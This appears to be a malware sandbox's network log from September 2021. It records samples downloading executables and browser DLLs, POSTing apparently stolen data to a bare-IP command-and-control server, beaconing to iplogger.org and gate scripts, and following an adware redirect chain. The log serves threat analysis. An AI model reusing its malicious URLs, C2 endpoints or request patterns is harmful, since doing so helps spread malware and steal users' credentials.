https://retse.info/dcc7975c8a99514da06323f0994cd79b.exe

2.exe

Remote address:

172.67.211.113:443

Request

GET /dcc7975c8a99514da06323f0994cd79b.exe HTTP/1.1
Host: retse.info
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Thu, 09 Sep 2021 04:29:29 GMT
Content-Type: application/octet-stream
Content-Length: 4659752
Connection: keep-alive
last-modified: Thu, 09 Sep 2021 03:57:26 GMT
Cache-Control: max-age=14400
CF-Cache-Status: HIT
Age: 987
Accept-Ranges: bytes
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=M4bxxWKNWw8jaKY6x2Z0Hj9lSKtImIctknSj39dDP3v8J7v8sQqMKjSBDyHBgZlSJmAHipDlP%2FlSziz9dy0NTYlSAAYUi45YCI%2FlD5ICOhkhOhzJIBe49S2rR4%2FR"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 68bdad060a2e1d22-CPH
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
POST

http://162.55.179.90/916

Alfanewfile2.exe

Remote address:

162.55.179.90:80

Request

POST /916 HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 25
Host: 162.55.179.90
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Thu, 09 Sep 2021 04:29:31 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip
GET

http://162.55.179.90/freebl3.dll

Alfanewfile2.exe

Remote address:

162.55.179.90:80

Request

GET /freebl3.dll HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Host: 162.55.179.90
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx
Date: Thu, 09 Sep 2021 04:29:31 GMT
Content-Type: application/x-msdos-program
Content-Length: 334288
Connection: keep-alive
Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT
ETag: "519d0-57aa1f0b0df80"
Expires: Fri, 10 Sep 2021 04:29:31 GMT
Cache-Control: max-age=86400
X-Cache-Status: HIT
X-Cache-Status: HIT
Accept-Ranges: bytes
GET

http://162.55.179.90/mozglue.dll

Alfanewfile2.exe

Remote address:

162.55.179.90:80

Request

GET /mozglue.dll HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Host: 162.55.179.90
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx
Date: Thu, 09 Sep 2021 04:29:32 GMT
Content-Type: application/x-msdos-program
Content-Length: 137168
Connection: keep-alive
Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT
ETag: "217d0-57aa1f0b0df80"
Expires: Fri, 10 Sep 2021 04:29:32 GMT
Cache-Control: max-age=86400
X-Cache-Status: EXPIRED
X-Cache-Status: HIT
Accept-Ranges: bytes
GET

http://162.55.179.90/msvcp140.dll

Alfanewfile2.exe

Remote address:

162.55.179.90:80

Request

GET /msvcp140.dll HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Host: 162.55.179.90
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx
Date: Thu, 09 Sep 2021 04:29:33 GMT
Content-Type: application/x-msdos-program
Content-Length: 440120
Connection: keep-alive
Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT
ETag: "6b738-57aa1f0b0df80"
Expires: Fri, 10 Sep 2021 04:29:33 GMT
Cache-Control: max-age=86400
X-Cache-Status: HIT
X-Cache-Status: HIT
Accept-Ranges: bytes
GET

http://162.55.179.90/nss3.dll

Alfanewfile2.exe

Remote address:

162.55.179.90:80

Request

GET /nss3.dll HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Host: 162.55.179.90
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx
Date: Thu, 09 Sep 2021 04:29:33 GMT
Content-Type: application/x-msdos-program
Content-Length: 1246160
Connection: keep-alive
Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT
ETag: "1303d0-57aa1f0b0df80"
Expires: Fri, 10 Sep 2021 04:29:33 GMT
Cache-Control: max-age=86400
X-Cache-Status: EXPIRED
X-Cache-Status: HIT
Accept-Ranges: bytes
GET

http://162.55.179.90/softokn3.dll

Alfanewfile2.exe

Remote address:

162.55.179.90:80

Request

GET /softokn3.dll HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Host: 162.55.179.90
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx
Date: Thu, 09 Sep 2021 04:29:34 GMT
Content-Type: application/x-msdos-program
Content-Length: 144848
Connection: keep-alive
Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT
ETag: "235d0-57aa1f0b0df80"
Expires: Fri, 10 Sep 2021 04:29:34 GMT
Cache-Control: max-age=86400
X-Cache-Status: EXPIRED
X-Cache-Status: HIT
Accept-Ranges: bytes
GET

http://162.55.179.90/vcruntime140.dll

Alfanewfile2.exe

Remote address:

162.55.179.90:80

Request

GET /vcruntime140.dll HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Host: 162.55.179.90
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx
Date: Thu, 09 Sep 2021 04:29:36 GMT
Content-Type: application/x-msdos-program
Content-Length: 83784
Connection: keep-alive
Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT
ETag: "14748-57aa1f0b0df80"
Expires: Fri, 10 Sep 2021 04:29:36 GMT
Cache-Control: max-age=86400
X-Cache-Status: EXPIRED
X-Cache-Status: HIT
Accept-Ranges: bytes
POST

http://162.55.179.90/

Alfanewfile2.exe

Remote address:

162.55.179.90:80

Request

POST / HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 30993
Host: 162.55.179.90
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Thu, 09 Sep 2021 04:29:39 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Content-Encoding: gzip
GET

https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6

IEXPLORE.EXE

Remote address:

192.243.59.13:443

Request

GET /e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: www.profitabletrustednetwork.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx/1.17.6
Date: Thu, 09 Sep 2021 04:29:31 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: u_pl=14575867; expires=Fri, 10 Sep 2021 04:29:31 GMT
Set-Cookie: ain=eyJhbGciOiJIUzI1NiJ9.eyJwIjp7ImlkIjoxNDU3NTg2NywiayI6ImE5NzFiYmU0YTQwYTcyMTZhMWE4N2Q4ZjQ1NWY3MWU2Iiwic2lkIjoiIiwiaXNpZCI6MiwiYXNpZCI6MSwiemlkIjoxMDYzMzYsInBpZCI6ODUxNTUsImFuIjp0cnVlLCJsYW4iOnRydWUsImNpZCI6MywiYWlkIjoyOCwicHQiOjQsInBrIjoiZTJxOHp1OWh1IiwiY3BrcyI6eyAiMzQiOiJiOGI2ZGRmN2IwNzdlMDgwMmYyYzMxMGU1MjgwM2ExZCJ9LCJ0IjoxfSwidSI6eyJ1IjoxLCJhdSI6MSwiZCI6eyJpZCI6MTU3NjAxLCJpZHMiOiIiLCJpYyI6ZmFsc2UsIm4iOiJEZXNrdG9wfEVtdWxhdG9yIiwidiI6IlVua25vd24iLCJtIjoiVW5rbm93biIsImYiOjEsImZuIjoiRGVza3RvcCIsIm9pZCI6NzEzMywib24iOiJXaW5kb3dzIiwib3YiOiI3IiwiYmlkIjoyMTQ2MSwiYm4iOiJJbnRlcm5ldCBFeHBsb3JlciIsImJ2IjoiMTEuMCIsInd2IjpmYWxzZSwiZSI6ZmFsc2UsImFiIjpmYWxzZX0sImMiOnsiaWQiOjIyMywiYyI6IlVTIiwibiI6IlVuaXRlZCBTdGF0ZXMifSwiYSI6ZmFsc2UsImNyIjp7Im4iOiJDb2dlbnQgQ29tbXVuaWNhdGlvbnMifSwieGYiOiIiLCJpeGYiOmZhbHNlLCJpZ3hmIjpmYWxzZSwidXAiOnRydWUsInIiOiIifX0.3tWdVcYzAxOX5skzrrMrHNfWqm3daJJ_X8E4gD8runQ; expires=Thu, 09 Sep 2021 04:30:31 GMT
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
X-Request-ID: dc89818fcd1a58e5b2f519e26cea0bf6
Strict-Transport-Security: max-age=0; includeSubdomains
Content-Encoding: gzip
GET

https://www.profitabletrustednetwork.com/e2q8zu9hu?shu=2c908030cdb9e682646ff6a82bb14481c6d3ec3fb86446bab40da1eecfe6a2ce663a8b465886cc99f5f2133a25a665f6de565bbabe2684be11edbf3fc7cbe15b8e81b26e83cd90d88e450015e0bc4a3e06a635&pst=1631161831&rmtc=t&uuid=&pii=&in=false&key=a971bbe4a40a7216a1a87d8f455f71e6

IEXPLORE.EXE

Remote address:

192.243.59.13:443

Request

GET /e2q8zu9hu?shu=2c908030cdb9e682646ff6a82bb14481c6d3ec3fb86446bab40da1eecfe6a2ce663a8b465886cc99f5f2133a25a665f6de565bbabe2684be11edbf3fc7cbe15b8e81b26e83cd90d88e450015e0bc4a3e06a635&pst=1631161831&rmtc=t&uuid=&pii=&in=false&key=a971bbe4a40a7216a1a87d8f455f71e6 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://www.profitabletrustednetwork.com/e2q8zu9hu?key=0f22c1fd609f13cb7947c8cabfe1a90d&submetric=14575867
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: www.profitabletrustednetwork.com
Connection: Keep-Alive
Cookie: u_pl=14575867; ain=eyJhbGciOiJIUzI1NiJ9.eyJwIjp7ImlkIjoxNDU3NTg2NywiayI6ImE5NzFiYmU0YTQwYTcyMTZhMWE4N2Q4ZjQ1NWY3MWU2Iiwic2lkIjoiIiwiaXNpZCI6MiwiYXNpZCI6MSwiemlkIjoxMDYzMzYsInBpZCI6ODUxNTUsImFuIjp0cnVlLCJsYW4iOnRydWUsImNpZCI6MywiYWlkIjoyOCwicHQiOjQsInBrIjoiZTJxOHp1OWh1IiwiY3BrcyI6eyAiMzQiOiJiOGI2ZGRmN2IwNzdlMDgwMmYyYzMxMGU1MjgwM2ExZCJ9LCJ0IjoxfSwidSI6eyJ1IjoxLCJhdSI6MSwiZCI6eyJpZCI6MTU3NjAxLCJpZHMiOiIiLCJpYyI6ZmFsc2UsIm4iOiJEZXNrdG9wfEVtdWxhdG9yIiwidiI6IlVua25vd24iLCJtIjoiVW5rbm93biIsImYiOjEsImZuIjoiRGVza3RvcCIsIm9pZCI6NzEzMywib24iOiJXaW5kb3dzIiwib3YiOiI3IiwiYmlkIjoyMTQ2MSwiYm4iOiJJbnRlcm5ldCBFeHBsb3JlciIsImJ2IjoiMTEuMCIsInd2IjpmYWxzZSwiZSI6ZmFsc2UsImFiIjpmYWxzZX0sImMiOnsiaWQiOjIyMywiYyI6IlVTIiwibiI6IlVuaXRlZCBTdGF0ZXMifSwiYSI6ZmFsc2UsImNyIjp7Im4iOiJDb2dlbnQgQ29tbXVuaWNhdGlvbnMifSwieGYiOiIiLCJpeGYiOmZhbHNlLCJpZ3hmIjpmYWxzZSwidXAiOnRydWUsInIiOiIifX0.3tWdVcYzAxOX5skzrrMrHNfWqm3daJJ_X8E4gD8runQ; cjs=t

Response

HTTP/1.1 302 Found

Server: nginx/1.17.6
Date: Thu, 09 Sep 2021 04:29:38 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Location: https://starlightwin.info/click.php?key=9nn8ev0rmjloxiexmppr&SUB_ID_SHORT=a4174b49fd8b758bca9d1fa5c7c39251&PLACEMENT_ID=14575867&CAMPAIGN_ID=470720&DEVICE_BRAND=Unknown&BROWSER_NAME=Internet%20Explorer&USER_OS=Windows&USER_CARRIER=Cogent%20Communications&USERAGENT=Mozilla%2F5.0%20%28Windows%20NT%206.1%3B%20WOW64%3B%20Trident%2F7.0%3B%20rv%3A11.0%29%20like%20Gecko&REMOTE_LANGUAGE=11&BANNER_ID=1466549
Set-Cookie: iprcb80cbb8332ad23486991743f8e572a17=2903337; expires=Thu, 09 Sep 2021 05:29:38 GMT
Set-Cookie: pdhtkv=true; expires=Fri, 10 Sep 2021 04:29:38 GMT
Set-Cookie: uncs=1; expires=Fri, 10 Sep 2021 04:29:38 GMT
Set-Cookie: pdhtkv28=true; expires=Fri, 10 Sep 2021 04:29:38 GMT
Set-Cookie: uncs28=1; expires=Fri, 10 Sep 2021 04:29:38 GMT
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
X-Request-ID: 3194b30e75537cb059baaa7005e4bb67
Strict-Transport-Security: max-age=0; includeSubdomains
GET

https://iplogger.org/1keUt7

BearVpn 3.exe

Remote address:

88.99.66.31:443

Request

GET /1keUt7 HTTP/1.1
Host: iplogger.org
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx
Date: Thu, 09 Sep 2021 04:29:35 GMT
Content-Type: image/png
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=qvi1rrc9l9junosobeeh9res52; path=/; HttpOnly
Pragma: no-cache
Set-Cookie: clhf03028ja=154.61.71.51; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=247886416; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Answers:
whoami: c3af235b5b9c8f8c0657cab7c8c85f85d97100c7d13cb4fb6626c667e06b697f
Strict-Transport-Security: max-age=31536000; preload
X-Frame-Options: DENY
DNS

startupmart.bar

PublicDwlBrowser1100.exe

Remote address:

8.8.8.8:53

Request

startupmart.bar

IN A

Response

startupmart.bar

IN A

104.21.37.182

startupmart.bar

IN A

172.67.211.161
DNS

downloadlog.com

postback.exe

Remote address:

8.8.8.8:53

Request

downloadlog.com

IN A

Response

downloadlog.com

IN A

188.119.65.241
GET

http://downloadlog.com/74.asdff

postback.exe

Remote address:

188.119.65.241:80

Request

GET /74.asdff HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)
Host: downloadlog.com

Response

HTTP/1.1 200 OK

Server: nginx
Date: Thu, 09 Sep 2021 04:29:37 GMT
Content-Length: 247808
Connection: close
Last-Modified: Wed, 01 Sep 2021 13:38:41 GMT
ETag: "3c800-5caef2f32f367"
Accept-Ranges: bytes
GET

https://startupmart.bar/?user_auth=p10_1

PublicDwlBrowser1100.exe

Remote address:

104.21.37.182:443

Request

GET /?user_auth=p10_1 HTTP/1.1
Host: startupmart.bar
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Thu, 09 Sep 2021 04:29:38 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
x-powered-by: PHP/7.1.33
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Ze7kWmoJaF3MN2cV7vuxsQJKNEJ2ImJpk33DurQRKdu4ky1Gxty3Y1odB6erufEmn97E6awjYO%2BfwrAs9E7vBN6jGQ3%2Fo5aoitlcDrJTKt0sfrcWLxySupoDMt1xXAtSQT0%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 68bdad3a5c9d5959-AMS
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
GET

https://startupmart.bar/?user_auth=p10_2

PublicDwlBrowser1100.exe

Remote address:

104.21.37.182:443

Request

GET /?user_auth=p10_2 HTTP/1.1
Host: startupmart.bar

Response

HTTP/1.1 200 OK

Date: Thu, 09 Sep 2021 04:29:44 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
x-powered-by: PHP/7.1.33
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=VDhf8Ie7yHGxWcZ6YTJFEWXIkjDc0jl33KeMmoJlB%2FJK%2F9ut6Y%2F47Ky8eC49it5%2B2XtrDpdnrbJ2ZfNQAOs2vNduawVUCaf4HokIuUW6jot2X9GS%2F%2FHiNNqj%2FzALCI6z%2BZ0%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 68bdad62fce15959-AMS
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
GET

https://startupmart.bar/?user_auth=p10_3

PublicDwlBrowser1100.exe

Remote address:

104.21.37.182:443

Request

GET /?user_auth=p10_3 HTTP/1.1
Host: startupmart.bar

Response

HTTP/1.1 200 OK

Date: Thu, 09 Sep 2021 04:29:49 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
x-powered-by: PHP/7.1.33
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=kWLsEUMj%2FRFnDOnu3vLCY0iQIfbOi4DWpGvuC2mfrVU7P%2FLEDfv4lAwZKa5fVCmSXE%2BCVm2xTo%2BP7Rze85T%2F15BgjXI44PjTlHd7%2BwaVtMH4oX2Adp6PYpjyFGszTj4LsMU%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 68bdad75ce3f5959-AMS
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
GET

https://startupmart.bar/?user_auth=p10_4

PublicDwlBrowser1100.exe

Remote address:

104.21.37.182:443

Request

GET /?user_auth=p10_4 HTTP/1.1
Host: startupmart.bar

Response

HTTP/1.1 200 OK

Date: Thu, 09 Sep 2021 04:29:57 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
x-powered-by: PHP/7.1.33
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=D219wtnRQINkTb1bco9EOR0nToNOMVYAaYLQKiwr4ONTdFKTp31BPQERsEClDw0dlqazk%2Fg%2BNPXxRNGKIij6MLNAE28HGSBtAcvuhL3kZa9L54LIHATbtbW75R2E2GcjOQs%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 68bdadabafb45959-AMS
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
GET

https://startupmart.bar/?user_auth=p10_5

PublicDwlBrowser1100.exe

Remote address:

104.21.37.182:443

Request

GET /?user_auth=p10_5 HTTP/1.1
Host: startupmart.bar

Response

HTTP/1.1 200 OK

Date: Thu, 09 Sep 2021 04:30:05 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
x-powered-by: PHP/7.1.33
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Vta5ES9zyd78PV0eSIiO99GTEPGvU0SsQ2hTSoA2ZGwvLzunKPPv40ASUcJa7OybwMbWEgNsjpL1CuMe%2FTVXnMtiwiA4124zG9aiIyph8xT6Bjq6u3fgpfY5KScm8Un18T4%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 68bdaddbcd965959-AMS
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
GET

https://startupmart.bar/?user_auth=p10_6

PublicDwlBrowser1100.exe

Remote address:

104.21.37.182:443

Request

GET /?user_auth=p10_6 HTTP/1.1
Host: startupmart.bar

Response

HTTP/1.1 200 OK

Date: Thu, 09 Sep 2021 04:30:11 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
x-powered-by: PHP/7.1.33
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=OzW4xxJEtCjyPJ1OAafDNRdtOunTxRgM0u0jMtWkiYg8ET0yTyFoyATMjvuIMhwVuOC8yPjrMQ5Eym0BusxWQV8NnPjGeoZKqUOS8e2ADzp14eF4Y7ZpSx2kybehs1I1W4w%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 68bdae096d235959-AMS
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
DNS

starlightwin.info

IEXPLORE.EXE

Remote address:

8.8.8.8:53

Request

starlightwin.info

IN A

Response

starlightwin.info

IN A

138.197.221.170
GET

https://starlightwin.info/click.php?key=9nn8ev0rmjloxiexmppr&SUB_ID_SHORT=a4174b49fd8b758bca9d1fa5c7c39251&PLACEMENT_ID=14575867&CAMPAIGN_ID=470720&DEVICE_BRAND=Unknown&BROWSER_NAME=Internet%20Explorer&USER_OS=Windows&USER_CARRIER=Cogent%20Communications&USERAGENT=Mozilla%2F5.0%20%28Windows%20NT%206.1%3B%20WOW64%3B%20Trident%2F7.0%3B%20rv%3A11.0%29%20like%20Gecko&REMOTE_LANGUAGE=11&BANNER_ID=1466549

IEXPLORE.EXE

Remote address:

138.197.221.170:443

Request

GET /click.php?key=9nn8ev0rmjloxiexmppr&SUB_ID_SHORT=a4174b49fd8b758bca9d1fa5c7c39251&PLACEMENT_ID=14575867&CAMPAIGN_ID=470720&DEVICE_BRAND=Unknown&BROWSER_NAME=Internet%20Explorer&USER_OS=Windows&USER_CARRIER=Cogent%20Communications&USERAGENT=Mozilla%2F5.0%20%28Windows%20NT%206.1%3B%20WOW64%3B%20Trident%2F7.0%3B%20rv%3A11.0%29%20like%20Gecko&REMOTE_LANGUAGE=11&BANNER_ID=1466549 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://www.profitabletrustednetwork.com/e2q8zu9hu?key=0f22c1fd609f13cb7947c8cabfe1a90d&submetric=14575867
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: starlightwin.info
Connection: Keep-Alive

Response

HTTP/1.1 302 Found

Server: nginx/1.18.0
Date: Thu, 09 Sep 2021 04:29:40 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: uclick=u3dvy9yd; expires=Fri, 10-Sep-2021 04:29:40 GMT; Max-Age=86400; path=/; secure; SameSite=none
Set-Cookie: uclickhash=u3dvy9yd-u3dvy9yd-p2i4-0-ydfe-52uq-52my-05225a; expires=Fri, 10-Sep-2021 04:29:40 GMT; Max-Age=86400; path=/; secure; SameSite=none
Location: https://ihotdates.com/en03/?trafficsource=8&campaign=702&funnelid=Unknown&zoneid=Windows&kk=9nn8ev0rmjloxiexmppr&source=14575867&banner=470720&PLACEMENT_ID=14575867&BANNER_ID=1466549&pushdisp=1&uclick=u3dvy9yd&uclickhash=u3dvy9yd-u3dvy9yd-p2i4-0-ydfe-52uq-52my-05225a
Strict-Transport-Security: max-age=31536000
DNS

nopedope1.com

explorer.exe

Remote address:

8.8.8.8:53

Request

nopedope1.com

IN A

Response

nopedope1.com

IN A

104.21.6.118

nopedope1.com

IN A

172.67.134.210
DNS

ihotdates.com

IEXPLORE.EXE

Remote address:

8.8.8.8:53

Request

ihotdates.com

IN A

Response

ihotdates.com

IN A

138.68.233.239
GET

http://nopedope1.com/hit.php?a=%7BreGJfkZF9Pjf1OLmflj3Y%7Did=74

explorer.exe

Remote address:

104.21.6.118:80

Request

GET /hit.php?a=%7BreGJfkZF9Pjf1OLmflj3Y%7Did=74 HTTP/1.1
Connection: Keep-Alive
User-Agent: deus vult
Host: nopedope1.com

Response

HTTP/1.1 200 OK

Date: Thu, 09 Sep 2021 04:29:44 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
vary: Accept-Encoding
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Djg83GGQ%2Fu6dRNGjf%2BxfbUXtwPSl8L6NxRy2tSqYQUG3BFFBvzEIh2nfNEe38bQGMsBG8HqiOaXNYgVraYcIk6si7jILMqIoaB7nnmPDJg9jp5X0UyRjhTSi8ARsLcvb"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 68bdad4fcbc44c97-AMS
GET

http://nopedope1.com/gate2.php?a=true&ssid=74

explorer.exe

Remote address:

104.21.6.118:80

Request

GET /gate2.php?a=true&ssid=74 HTTP/1.1
Connection: Keep-Alive
User-Agent: deus vult
Host: nopedope1.com

Response

HTTP/1.1 200 OK

Date: Thu, 09 Sep 2021 04:29:44 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
CF-Cache-Status: DYNAMIC
